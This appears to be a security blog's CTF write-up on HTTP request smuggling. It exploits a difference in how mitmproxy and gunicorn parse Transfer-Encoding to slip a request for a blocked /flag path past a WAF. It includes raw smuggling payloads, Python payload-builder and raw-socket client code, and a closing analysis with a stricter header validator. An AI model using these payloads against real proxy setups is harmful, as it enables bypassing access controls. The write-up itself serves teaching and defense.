HTTP Request Smuggling - Deteact - continuous information security services

Many different attacks go by the name HTTP Request Smuggling. Let’s look at a simple example from the SpamAndFlags CTF competition (I participated with the More Smoked Leet Chicken team, and we sadly finished 2nd).

The vulnerable application (challenge) was deployed using gunicorn as the application server and mitmproxy as a WAF, and consisted of two files: run.sh and filter.py. The flag for this task was in a file named “flag” in the same directory.

The code for run.sh:

#!/bin/bash
mitmdump --mode reverse:http://127.0.0.1:8000 -p 8080 -s filter.py --set block_global=false --no-http2 &
gunicorn --threads 8 --bind 127.0.0.1:8000 flask_autoindex.run:app

The code for filter.py:

from mitmproxy import http
import re

def request(flow):
    if 'flag' in flow.request.url or re.match(r'^http://127.0.0.1:8000/[a-z._/]*$', flow.request.url) is None:
        flow.response = http.HTTPResponse.make(418, b"I'm a teapot!")

So basically, what we need to do is somehow request http://target:8080/flag, but we cannot pass the substring “flag” in the request URI, nor can we encode the path, because the regex only allows lowercase letters, dots, underscores and slashes after the host.
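To see what the filter accepts, its condition can be pulled out into a standalone predicate. This is only a sketch: is_blocked is a hypothetical helper name that does not exist in the challenge, and the URLs are made-up inputs in the form the regex expects.

```python
import re

# Same pattern as in filter.py.
ALLOWED = re.compile(r'^http://127.0.0.1:8000/[a-z._/]*$')


def is_blocked(url: str) -> bool:
    """Mirror the condition in filter.py (hypothetical helper, for illustration)."""
    return 'flag' in url or ALLOWED.match(url) is None


for url in (
    'http://127.0.0.1:8000/z',       # plain lowercase path
    'http://127.0.0.1:8000/flag',    # contains the substring "flag"
    'http://127.0.0.1:8000/%66lag',  # '%' and digits fall outside [a-z._/]
    'http://127.0.0.1:8000/FLAG',    # uppercase falls outside [a-z._/]
):
    print(url, '->', 'blocked' if is_blocked(url) else 'allowed')
```

Only the first URL gets through, so no rewriting of the path alone will reach the flag.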

Such a setup with a reverse proxy is a typical target for HTTP request smuggling attacks. The intended solution (and a well-known technique) for this challenge was to upgrade the connection to WebSocket by exploiting differences in how gunicorn and mitmproxy handle the Sec-WebSocket-Key1 header. But I found what is probably a more obvious exploit.

How do you approach such a task? Obviously, you need to read the source code of both mitmproxy and gunicorn to figure out how they parse HTTP messages.

The clue can be found in mitmproxy/net/http/http1/read.py and gunicorn/http/message.py, in the mitmproxy and gunicorn source code respectively.

Chunked encoding detection in mitmproxy:

Chunked encoding detection in gunicorn:

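Clearly, the two servers treat the Transfer-Encoding header value differently: mitmproxy checks whether it contains the substring “chunked”, while gunicorn requires the whole value to equal “chunked”. This creates the possibility of a “TE-CL” HTTP Request Smuggling attack, in which the front end frames the body by Transfer-Encoding and the back end by Content-Length.

Let’s deploy the application locally and test it with Wireshark listening. Try the following payload: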
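The difference can be reproduced with two tiny functions. These are simplified stand-ins written for this post, not verbatim code from either project; the function names are hypothetical, and the only thing taken from the sources is the kind of comparison each side makes.

```python
def proxy_sees_chunked(te_value: str) -> bool:
    # Substring test, the behaviour attributed to the front end (mitmproxy).
    return 'chunked' in te_value.lower()


def backend_sees_chunked(te_value: str) -> bool:
    # Whole-string test, the behaviour attributed to the back end (gunicorn).
    return te_value.lower() == 'chunked'


for value in ('chunked', 'chunkedasd', 'gzip, chunked'):
    print(repr(value),
          'proxy:', proxy_sees_chunked(value),
          'backend:', backend_sees_chunked(value))
```

Any value on which the two functions disagree is a candidate for desynchronizing the two parsers.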

GET /z HTTP/1.1
Host: 127.0.0.1:8080
Transfer-Encoding: chunkedasd
Content-Length: 4

2c
GET /flag HTTP/1.1
Host: 127.0.0.1:8080


0

Here we made mitmproxy believe that this is a chunked request (since the “chunked” substring is present in the header value). The chunked request body consists of a single chunk of length 44 (0x2c) that contains another HTTP message, followed by the terminating zero-length chunk.
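The chunk size and the Content-Length value are easy to get wrong by hand, so here is a small sketch that derives both from the smuggled request. The names SMUGGLED and build_payload are hypothetical; the bytes themselves are the payload shown above with explicit CRLF line endings.

```python
# The request we want the back end to see as a separate message.
SMUGGLED = (
    b'GET /flag HTTP/1.1\r\n'
    b'Host: 127.0.0.1:8080\r\n'
    b'\r\n'
)


def build_payload(smuggled: bytes) -> bytes:
    """Wrap a smuggled request in one chunk (hypothetical helper)."""
    size_line = b'%x\r\n' % len(smuggled)  # chunk size in hex, plus CRLF
    return b''.join([
        b'GET /z HTTP/1.1\r\n',
        b'Host: 127.0.0.1:8080\r\n',
        b'Transfer-Encoding: chunkedasd\r\n',
        # Content-Length covers only the chunk-size line.
        b'Content-Length: %d\r\n' % len(size_line),
        b'\r\n',
        size_line,
        smuggled,
        b'\r\n',        # end of the chunk data
        b'0\r\n\r\n',   # terminating zero-length chunk
    ])


print(len(SMUGGLED), hex(len(SMUGGLED)))
print(build_payload(SMUGGLED).decode())
```

Deriving the two numbers from the data keeps them consistent if the smuggled request changes, for example when the Host header is edited.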

Now, gunicorn doesn’t handle this as a chunked request because the Transfer-Encoding header value is not equal to “chunked”. Instead, it uses the Content-Length value of 4, which covers exactly the chunk-size line (“2c” plus CRLF), so gunicorn treats the rest of the message as another HTTP request. But the response doesn’t contain anything interesting.
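The back end’s view of the same bytes can be sketched by framing the stream with Content-Length only. This is a toy parser written for illustration (split_by_content_length is a hypothetical name, and it is not how gunicorn is implemented); it just shows where the first message ends under that rule.

```python
STREAM = (
    b'GET /z HTTP/1.1\r\n'
    b'Host: 127.0.0.1:8080\r\n'
    b'Transfer-Encoding: chunkedasd\r\n'
    b'Content-Length: 4\r\n'
    b'\r\n'
    b'2c\r\n'
    b'GET /flag HTTP/1.1\r\n'
    b'Host: 127.0.0.1:8080\r\n'
    b'\r\n'
    b'\r\n'
    b'0\r\n'
    b'\r\n'
)


def split_by_content_length(stream: bytes):
    """Return (head, body, leftover) using only Content-Length for framing."""
    head, _, rest = stream.partition(b'\r\n\r\n')
    length = 0
    for line in head.split(b'\r\n')[1:]:  # skip the request line
        name, _, value = line.partition(b':')
        if name.strip().lower() == b'content-length':
            length = int(value.strip())
    return head, rest[:length], rest[length:]


head, body, leftover = split_by_content_length(STREAM)
print('body of first request:', body)
print('next message starts with:', leftover.split(b'\r\n')[0])
```

The body of the first request is just the chunk-size line, and the leftover bytes begin with the smuggled request line.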

Why is that? The Wireshark capture from the local test explains it.

That’s nice: gunicorn actually returns responses for both requests, but we (as an external attacker) see only the first one, because mitmproxy expects a single HTTP response and reads it accordingly (up to the length specified in the Content-Length header).

To get the second response, we need to send another HTTP request to mitmproxy on the same connection so that it expects one more response:

GET /z HTTP/1.1
Host: 127.0.0.1:8080
Transfer-Encoding: chunkedasd
Content-Length: 4

2c
GET /flag HTTP/1.1
Host: 127.0.0.1:8000


0

GET / HTTP/1.1
Host: 127.0.0.1:8080

As a result, our request successfully reaches the “secret backend endpoint” and we get the flag in the second response.
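A standard HTTP client will not send a message like this, so the payload has to be written to a raw socket. Below is a minimal sketch of such a client, assuming the responses are framed with Content-Length; send_raw and split_responses are hypothetical helper names, and the timeout-based read loop is a simplification rather than a robust HTTP reader.

```python
import socket


def send_raw(host: str, port: int, payload: bytes, timeout: float = 3.0) -> bytes:
    """Send raw bytes on one TCP connection and read until the peer goes quiet."""
    received = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            while True:
                data = sock.recv(4096)
                if not data:          # connection closed by the peer
                    break
                received.append(data)
        except socket.timeout:        # no more data within the timeout
            pass
    return b''.join(received)


def split_responses(raw: bytes) -> list:
    """Split back-to-back responses into (head, body) pairs by Content-Length."""
    responses = []
    while raw:
        head, sep, rest = raw.partition(b'\r\n\r\n')
        if not sep:                   # incomplete header block, stop
            break
        length = 0
        for line in head.split(b'\r\n')[1:]:
            name, _, value = line.partition(b':')
            if name.strip().lower() == b'content-length':
                length = int(value.strip())
        responses.append((head, rest[:length]))
        raw = rest[length:]
    return responses
```

Against the local deployment, the bytes of the second payload would be passed to send_raw('127.0.0.1', 8080, payload) and the result to split_responses; the second pair in the returned list is the response that the proxy attributes to the trailing GET / request.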

Whose fault is this bug? Well, that’s a tricky question. Neither implementation properly parses HTTP headers and their values, so there’s no single bug here. Gunicorn’s exact string matching is probably too strict and is not RFC compliant, because the Transfer-Encoding header can contain a list of values (e.g. “gzip, chunked”), while mitmproxy’s substring matching accepts values that are not valid codings at all. Many other setups may be vulnerable for the same reason.
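For comparison, a stricter check would parse the header as a comma-separated list and reject anything it does not understand. The sketch below follows the rule in RFC 7230, section 3.3.1, that chunked must be the final coding applied to a request body; the function name and the decision to reject empty list items and coding parameters are assumptions of this sketch, not behaviour of either project.

```python
# Transfer codings defined in RFC 7230.
KNOWN_CODINGS = {'chunked', 'compress', 'deflate', 'gzip'}


def parse_request_transfer_encoding(value: str) -> list:
    """Return the list of codings, or raise ValueError if the value is invalid."""
    codings = [item.strip().lower() for item in value.split(',')]
    unknown = [c for c in codings if c not in KNOWN_CODINGS]
    if unknown:
        raise ValueError('unknown transfer coding: %r' % unknown[0])
    # On a request, chunked must appear exactly once and be the last coding.
    if codings.count('chunked') != 1 or codings[-1] != 'chunked':
        raise ValueError('chunked must be the final transfer coding')
    return codings


for value in ('chunked', 'gzip, chunked', 'chunkedasd'):
    try:
        print(repr(value), '->', parse_request_transfer_encoding(value))
    except ValueError as exc:
        print(repr(value), '-> rejected:', exc)
```

If both the proxy and the application server rejected such requests instead of guessing, the payload from this post would be answered with an error by the first hop and never reach the back end.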

As you can see, securing web applications and multi-layered infrastructures can be tricky. If you’re not sure about the security of your product, contact us for penetration testing or consulting.
